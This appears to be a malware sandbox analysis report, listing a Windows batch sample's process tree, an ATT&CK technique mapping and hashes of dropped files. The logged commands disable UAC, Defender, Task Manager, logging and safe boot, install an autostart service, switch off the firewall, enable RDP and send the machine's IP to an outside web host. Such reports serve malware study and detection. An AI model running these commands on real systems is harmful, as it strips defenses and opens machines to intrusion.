C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached" /f
2⤵
- Modifies data under HKEY_USERS
PID:6064

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /f
2⤵
- Modifies data under HKEY_USERS
PID:6104

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f
2⤵
- Modifies data under HKEY_USERS
PID:6128

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f
2⤵
- Modifies data under HKEY_USERS
PID:1572

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f
2⤵
- Modifies data under HKEY_USERS
PID:5152

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f
2⤵
- Modifies data under HKEY_USERS
PID:756

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
2⤵
- UAC bypass
PID:5612

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5620

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:5632

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:5960

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f
2⤵
PID:5828

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f
2⤵
- Modifies data under HKEY_USERS
PID:5796

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:5204

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:6116

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:6136

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:3264

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
PID:888

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:5760

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:5736

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f
2⤵
PID:5632

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f
2⤵
PID:6104

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "EnableScriptBlockLogging" /t REG_DWORD /d 0 /f
2⤵
PID:5392

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Undefined" /f
2⤵
PID:5368

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ScriptBlockLogging" /t REG_DWORD /d 0 /f
2⤵
PID:5728

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f
2⤵
PID:756

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f
2⤵
PID:3524

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
2⤵
- Modifies data under HKEY_USERS
PID:5800

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
2⤵
PID:5808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4
2⤵
PID:1276

C:\Windows\system32\ipconfig.exe
ipconfig
3⤵
- Gathers network information
PID:1880

C:\Windows\system32\findstr.exe
findstr IPv4
3⤵
PID:5852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c whoami
2⤵
PID:5152

C:\Windows\system32\whoami.exe
whoami
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net user "BVRKIPTS$"
2⤵
PID:900

C:\Windows\system32\net.exe
net user "BVRKIPTS$"
3⤵
PID:5580

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\notepad.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5512

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5488

C:\Windows\system32\manage-bde.exe
manage-bde -off C:
2⤵
PID:6116

C:\Windows\system32\manage-bde.exe
manage-bde -on C:
2⤵
PID:5440

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled yes
2⤵
- Modifies boot configuration data using bcdedit
PID:5748

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
2⤵
- Modifies boot configuration data using bcdedit
PID:396

C:\Windows\system32\sc.exe
sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
2⤵
- Launches sc.exe
PID:5656

C:\Windows\system32\net.exe
net start MiServicio
2⤵
PID:5512

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start MiServicio
3⤵
PID:1880

C:\Windows\system32\takeown.exe
takeown /F "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:432

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5488

C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5588

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5748

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5916

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:5728

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:5724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
1⤵
PID:6204

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\malware.bat"
1⤵
PID:1368

C:\Windows\system32\net.exe
net session
2⤵
PID:6276

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
3⤵
PID:6260

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1840

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3724

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1640

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5024

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\PlugPlay' -Name 'Start' -Value 4"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6248

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=3389
2⤵
- Modifies Windows Firewall
PID:6360

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv4
2⤵
- Modifies Windows Firewall
PID:412

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow
2⤵
- Modifies Windows Firewall
PID:6400

C:\Windows\system32\netsh.exe
netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
2⤵
- Modifies Windows Firewall
PID:3260

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:6152

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
2⤵
PID:6332

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f
2⤵
PID:4368

C:\Windows\system32\reg.exe
REG IMPORT "C:\Users\Admin\AppData\Local\Temp\disable_winload.reg"
2⤵
PID:3852

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f
2⤵
PID:392

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached" /f
2⤵
PID:6160

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /f
2⤵
PID:5296

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f
2⤵
PID:840

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f
2⤵
PID:4304

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f
2⤵
PID:5276

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f
2⤵
PID:5336

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
2⤵
PID:2640

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:2196

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f
2⤵
PID:1136

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f
2⤵
PID:3060

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f
2⤵
PID:2704

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:1276

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:6136

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:5940

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:5368

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
PID:3468

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
2⤵
PID:6036

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f
2⤵
PID:5812

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f
2⤵
PID:6100

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f
2⤵
PID:5204

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "EnableScriptBlockLogging" /t REG_DWORD /d 0 /f
2⤵
PID:5776

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Undefined" /f
2⤵
PID:5828

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ScriptBlockLogging" /t REG_DWORD /d 0 /f
2⤵
PID:5972

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f
2⤵
PID:6056

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f
2⤵
PID:5952

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
2⤵
PID:5668

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
2⤵
PID:5688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4
2⤵
PID:5700

C:\Windows\system32\ipconfig.exe
ipconfig
3⤵
- Gathers network information
PID:5988

C:\Windows\system32\findstr.exe
findstr IPv4
3⤵
PID:6336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.0.107
2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d5be46f8,0x7ff9d5be4708,0x7ff9d5be4718
3⤵
PID:1660

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
3⤵
PID:4768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2636 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3968

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3016 /prefetch:8
3⤵
PID:808

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
3⤵
PID:3868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
3⤵
PID:6560

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5160 /prefetch:8
3⤵
PID:4752

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5160 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4724

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
3⤵
PID:7096

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1
3⤵
PID:7104

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1
3⤵
PID:5492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
3⤵
PID:5932

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2028 /prefetch:2
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c whoami
2⤵
PID:4384

C:\Windows\system32\whoami.exe
whoami
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:900

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6748

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6964

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

File and Directory Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
9be60d1c7db05918d977790c37ffd5d5

SHA1
40653b45e82ba27cc724d8ba45914c45c8503c9d

SHA256
4f50b8ee1676079d53210e20b3a10f8f490cead0dbf9ee02238d7dd317f9cdf5

SHA512
15f3ea65119d356a1693747c5631838ec79df11525c0320fb0fb37a92241e8073855ec4f44237dec142fab16b7c375bd76cc9d63471cb10d1003a3136dfe6629

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
ea9aa3ce07afc05c5a55a0dc4b8aa259

SHA1
173d2d3fdc2e466a05f6f3abf4c600499ecb726c

SHA256
143914d5a1e62f4329ce51cd5cf73f3a797af5e15eb52cab7fbb1b34395d342a

SHA512
d5738c63312647a49d583770eeb8e6eef54687a3b38843e76e30f5f83b9a3d3eb42fb34615ef38878243f0084d8d4753011db15a0ed422cb36e81e1d4f8c5004

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
4158365912175436289496136e7912c2

SHA1
813d11f772b1cfe9ceac2bf37f4f741e5e8fbe59

SHA256
354de4b033ba6e4d85f94d91230cb8501f62e0a4e302cd4076c7e0ad73bedbd1

SHA512
74b4f7b24ad4ea395f3a4cd8dbfae54f112a7c87bce3d286ee5161f6b63d62dfa19bb0d96bb7ed1c6d925f5697a2580c25023d5052c6a09992e6fd9dd49ea82b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
ce4c898f8fc7601e2fbc252fdadb5115

SHA1
01bf06badc5da353e539c7c07527d30dccc55a91

SHA256
bce2dfaa91f0d44e977e0f79c60e64954a7b9dc828b0e30fbaa67dbe82f750aa

SHA512
80fff4c722c8d3e69ec4f09510779b7e3518ae60725d2d36903e606a27ec1eaedbdbfac5b662bf2c19194c572ccf0125445f22a907b329ad256e6c00b9cf032c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0
Filesize
44KB

MD5
63824a71a00ed81fd38f6be255fc8a7e

SHA1
fa3e8bd1ab5c40c460ef92749e4c3633f60d6dd0

SHA256
cbabda38d23c0e5b5e50349e00e4e4dc261f90f531100b0b9b78c9b045b74bba

SHA512
9249857e1e88d47ae0bc3e862331fb473a8aa0c27311cb62b171af340b97d21e6727ac3bb3589d5ecac4159142c29f96fb8d19c09563d961ceb99008d2054af7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1
Filesize
264KB

MD5
4799fe82b594b04bfd88094bf5a2f9f4

SHA1
5157a3215683f0144746076e82c6483c95004f49

SHA256
3e50847df7025f1a651fe178064c99618a193ff87e9cde19bd7a9ac60537fa45

SHA512
0f84d431ac9a907bc5e09f39491c81330244ee75eadb557e72e55d3f027c279da6f867d1add0c32183cd9f09147dd96e3f7308987ac7a471052a6164fc39e045

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3
Filesize
4.0MB

MD5
8cebd8dcf18c86fa1e58edff6616a0e5

SHA1
94324dc129c519f77e6b671a8cadc572a487998a

SHA256
5b6ed02ad2564c85c5f7ce0bdc166b32385cf87aceccc70f1b7d63fb102ad5d2

SHA512
d030bf929e31dff89dc00a8bf79b1fd5aaea9091ee3f6f555bf7040697357a842679b0d81733759ec6b565f4cacd1f4798e074ef56dd927825967860ef241e48

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\e4339d5560b515fc_0
Filesize
12KB

MD5
aa4b7ade6722ae2e501cf09cafbed558

SHA1
682bc8d738e1f54a7fdcfd0ad937229e3d72dc28

SHA256
efc13f834444c8009e5893a07670448ba1d883c0693ac0486d8cd6e6adf35efc

SHA512
94fb2451c39bcbe4ab07a17b17a4b9515b9ba8dda27cb6a4c532d249e09b030f21180e0c24b74fb5005ab122dbaad5d6615dd9072f362fbbfea0b682d7c2aa1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
96B

MD5
426547cc28af13318076d5c6981d728f

SHA1
bd2eb40dcc2de52b17aac37ffbdfd70d3abc7196

SHA256
9d2a193921397e64dbe771656daaa27a098a1d1da0bddfab306e7a415a57561c

SHA512
